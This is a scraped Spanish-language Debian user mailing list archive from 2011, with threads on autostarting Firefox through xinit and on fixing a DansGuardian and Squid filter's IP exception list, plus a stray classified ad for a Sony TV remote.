hola como estas Alguna ves lo hice co xinit prueba y nos cuentas. Saludos El 13 de junio de 2011 19:12, Jesus Armando Paul Cespedes armando.p...@gmail.com escribió: Hola lista. Tengo una pregunta sobre como levantar un navegador firefox en una instalación básica de debian, tengo instalado solo el sistema base, instale firefox y xserver-xorg y tengo dudas en que mas necesite, solo necesito levantar una instancia de firefox automaticamente cuando inicia linux, trate con: firefox --display=0.0 -new-tab http://www.debian.org alguna idea de que me falten y/o se pueda realizar??? Saludos -- Diego Fernando Malavera Lopez Twitter: http://twitter.com/diegomalavera identi.ca: http://identi.ca/malavera Web: http://fresnolibre.fresnodigital.info/
Re: Firefox en debian basico
ok probare tu recomendación, gracias El 13 de junio de 2011 19:26, Diego Fernando Malavera Lopez malaver...@gmail.com escribió: hola como estas Alguna ves lo hice co xinit prueba y nos cuentas. Saludos El 13 de junio de 2011 19:12, Jesus Armando Paul Cespedes armando.p...@gmail.com escribió: Hola lista. Tengo una pregunta sobre como levantar un navegador firefox en una instalación básica de debian, tengo instalado solo el sistema base, instale firefox y xserver-xorg y tengo dudas en que mas necesite, solo necesito levantar una instancia de firefox automaticamente cuando inicia linux, trate con: firefox --display=0.0 -new-tab http://www.debian.org alguna idea de que me falten y/o se pueda realizar??? Saludos -- Diego Fernando Malavera Lopez Twitter: http://twitter.com/diegomalavera identi.ca: http://identi.ca/malavera Web: http://fresnolibre.fresnodigital.info/ -- -- Jesús Armando Paúl Céspedes Ingeniero en Ciencias Computacionales armando.p...@gmail.com armando.p...@gmail.com http://armandopaul.blogspot.com armando.p...@gmail.com User Linux Number : 530050 --
Re: Firefox en debian basico
~/.xinitrc exec firefox bla bla bla Enviado desde mi oficina móvil BlackBerry® -Original Message- From: Jesus Armando Paul Cespedes armando.p...@gmail.com Date: Mon, 13 Jun 2011 19:12:47 To: debian-user-spanish@lists.debian.org Subject: Firefox en debian basico Hola lista. Tengo una pregunta sobre como levantar un navegador firefox en una instalación básica de debian, tengo instalado solo el sistema base, instale firefox y xserver-xorg y tengo dudas en que mas necesite, solo necesito levantar una instancia de firefox automaticamente cuando inicia linux, trate con: firefox --display=0.0 -new-tab http://www.debian.org alguna idea de que me falten y/o se pueda realizar??? Saludos
Control remoto SONY Original para LCD TV - LCD HD Alta Definicion - LCD Bravia - LCD TV Monitor HD.
SONY LCD TV REMOTE COMMANDER RM-YA004 REMOTE Originally supplied with models: KLHW26, KLHW26/ST, KLHW26S, KLHW32, KLHW32/ST, KLHW32S, KLV32U100M, KLV40U100M, RMYA004 Control remoto SONY Original para LCD TV - LCD HD Alta Definicion - LCD Bravia - LCD TV Monitor HD. Este remplazo no es comercial, no se consigue en el mercado y no esiste la imitación. A precio Economico por solo 50.000 Pesitos. LH-W26 - 26 HD LCD DisplayKLH-W32 - 32 HD LCD Display.KLV-32U100M - BRAVIA® HDTV LCD Monitor (Tuner-less)KLV-40U100M - BRAVIA® HDTV LCD Monitor (Tuner-less) Jhon Prada 301-4545-397 3157268165 6625663 Cartagena / Bolívar
Re: Posible intrusión un server
Saludos: En realidad no se como lo hice pero dejé de entender buena parte del correo. Sugerí que buscara la forma de ver que usuario había sido el causante de la intrusión cuando él ya estaba pegando la salida del history de root. Lamento el malentendido. Pues la idea es aprender entre todos y es bueno que se forme el intercambio de ideas y opiniones tecnicas o no tan tecnicas. Aqui todos estamos para aprender y poder enseñar lo poco/mucho que tengamos para compartir. Atte: -- Alonso Eduardo Caballero Quezada aka ReYDeS - rey...@gmail.com OWASP Member / Brainbench Certified Computer Forensics (US) / SSP-CNSA www.iDev.pe / www.ReYDeS.com / www.npros.com.pe / LRU #307242 -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/banlktintpwrxr01kjwfyp8lkilxueq_...@mail.gmail.com
Re: dansguardian
2011/6/13 troxlinux xserverli...@gmail.com Slds lista , tengo un dansguardian trabajando con squid y funciona bien , el unico detalle es que cuando agrego una ip para que el filtro no lo pase en exceptioniplist no lo toma , y en dansguardian.conf tengo que lo tome. algo asi exceptioniplist = '/etc/dansguardian/exceptioniplist' alguna idea? sldss -- rickygm http://gnuforever.homelinux.com -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTi=LQdYmR5vb=vum2tiutcxkjri...@mail.gmail.com Saludos. No se que version estes utilizando pero la ultima vez que instale dansguardian, los archivos de lista blanca, lista negra estaban en este directorio: /etc/dansguardian/list Por lo que recuerdo, revisa bien donde este el archivo de lista de excepciones -- Orlando E. Nuñez A. TSU en Informática Direccion Electronica: onvi...@gmail.com Telefono: 04263609858
Re: dansguardian
El día 13 de junio de 2011 17:26, López Denazis Santiago vampireofsen...@gmail.com escribió: Buenas noches rickygm! Que tal si nos haces un pastebin de tu dansguardian.conf completo? Quiza alli encontremos el problema. Saludos, ok lo envio , les comento que todos los archivos estan /etc/dansguardian/ -- rickygm http://gnuforever.homelinux.com # DansGuardian config file for version 2.8.0 # **NOTE** as of version 2.7.5 most of the list files are now in dansguardianf1.conf # Web Access Denied Reporting (does not affect logging) # # -1 = log, but do not block - Stealth mode # 0 = just say 'Access Denied' # 1 = report why but not what denied phrase # 2 = report fully # 3 = use HTML template file (accessdeniedaddress ignored) - recommended # reportinglevel = 3 # Language dir where languages are stored for internationalisation. # The HTML template within this dir is only used when reportinglevel # is set to 3. When used, DansGuardian will display the HTML file instead of # using the perl cgi script. This option is faster, cleaner # and easier to customise the access denied page. # The language file is used no matter what setting however. # languagedir = '/etc/dansguardian/languages' # language to use from languagedir. language = 'spanish' # Logging Settings # # 0 = none 1 = just denied 2 = all text based 3 = all requests loglevel = 2 # Log Exception Hits # Log if an exception (user, ip, URL, phrase) is matched and so # the page gets let through. Can be useful for diagnosing # why a site gets through the filter. on | off logexceptionhits = on # Log File Format # 1 = DansGuardian format2 = CSV-style format # 3 = Squid Log File Format 4 = Tab delimited logfileformat = 3 # Log file location # # Defines the log directory and filename. loglocation = '/var/log/dansguardian/access.log' # Network Settings # # the IP that DansGuardian listens on. If left blank DansGuardian will # listen on all IPs. That would include all NICs, loopback, modem, etc. # Normally you would have your firewall protecting this, but if you want # you can limit it to only 1 IP. Yes only one. filterip = # the port that DansGuardian listens to. filterport = 8080 # the ip of the proxy (default is the loopback - i.e. this server) proxyip = 127.0.0.1 # the port DansGuardian connects to proxy on proxyport = 3128 #proxyport = 8090 # accessdeniedaddress is the address of your web server to which the cgi # dansguardian reporting script was copied # Do NOT change from the default if you are not using the cgi. # accessdeniedaddress = 'http://proxyf/cgi-bin/dansguardian.pl' # Non standard delimiter (only used with accessdeniedaddress) # Default is enabled but to go back to the original standard mode dissable it. nonstandarddelimiter = on # Banned image replacement # Images that are banned due to domain/url/etc reasons including those # in the adverts blacklists can be replaced by an image. This will, # for example, hide images from advert sites and remove broken image # icons from banned domains. # 0 = off # 1 = on (default) usecustombannedimage = 1 custombannedimagefile = '/etc/dansguardian/transparent1x1.gif' # Filter groups options # filtergroups sets the number of filter groups. A filter group is a set of content # filtering options you can apply to a group of users. The value must be 1 or more. # DansGuardian will automatically look for dansguardianfN.conf where N is the filter # group. To assign users to groups use the filtergroupslist option. All users default # to filter group 1. You must have some sort of authentication to be able to map users # to a group. The more filter groups the more copies of the lists will be in RAM so # use as few as possible. filtergroups = 1 filtergroupslist = '/etc/dansguardian/filtergroupslist' # Authentication files location bannediplist = '/etc/dansguardian/bannediplist' exceptioniplist = '/etc/dansguardian/exceptioniplist' banneduserlist = '/etc/dansguardian/banneduserlist' exceptionuserlist = '/etc/dansguardian/exceptionuserlist' # Show weighted phrases found # If enabled then the phrases found that made up the total which excedes # the naughtyness limit will be logged and, if the reporting level is # high enough, reported. on | off showweightedfound = on # Weighted phrase mode # There are 3 possible modes of operation: # 0 = off = do not use the weighted phrase feature. # 1 = on, normal = normal weighted phrase operation. # 2 = on, singular = each weighted phrase found only counts once on a page. # weightedphrasemode = 2 # Positive result caching for text URLs # Caches good pages so they don't need to be scanned again # 0 = off (recommended for ISPs with users with disimilar browsing) # 1000 = recommended for most users # 5000 = suggested max upper limit urlcachenumber = 5000 # # Age before they are stale and should be ignored in seconds # 0 = never # 900 = recommended = 15 mins urlcacheage = 900 # Smart and Raw phrase
Fwd: dansguardian
-- Mensaje reenviado -- De: López Denazis Santiago vampireofsen...@gmail.com Fecha: 13 de junio de 2011 20:51 Si no me equivoco, el error está acá: # Reverse lookups for banned and exception IP lists. # If set to on, DansGuardian will look up the forward DNS for the IP # of the connecting computer. This means you can put in hostnames in # the exceptioniplist and bannediplist. # It will reduce searching speed somewhat so unless you have a local DNS server, # leave it off. reverseclientiplookups = off La opción 'reverseclientiplookups' debería estar en 'on'. Por favor, reenvía mi mail a la lista que todavía no la tengo muy clara con esto. Saludos! Hola , gracias x contestar , la puse en on esa opcion que mencionas , pero sigue denegando un ip al que no quiero que le aplique el filtro de dansguardian ... 1308020814.959 1 127.0.0.1 TCP_DENIED/403 0 GET http://www.petardas.com - DEFAULT_PARENT/127.0.0.1 - cat exceptioniplist #IP addresses of computers to not filter #and just pass requests straight through to # #These would be servers which #need unfiltered access for #updates. Also administrator #workstations which need to #download programs and check #out blocked sites should be #put here. # #Only put IP addresses here, #not host names # #This is not the IP of web servers #you don't want to filter. 192.168.10.4 -- rickygm http://gnuforever.homelinux.com -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/banlktinffbl4ssdf6e45y_u1usa5o3c...@mail.gmail.com
Re: dansguardian
2011/6/13 troxlinux xserverli...@gmail.com: por cierto sorry por enviar esa pagina con que hice la prueba del dansguardian ,pero es lo mas rapido de probar si te permite pasar o no la pornografia, OJO no promuevo eso ... sldss -- rickygm http://gnuforever.homelinux.com -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/banlktimdhfp89c3okejsamf_kfgmmbi...@mail.gmail.com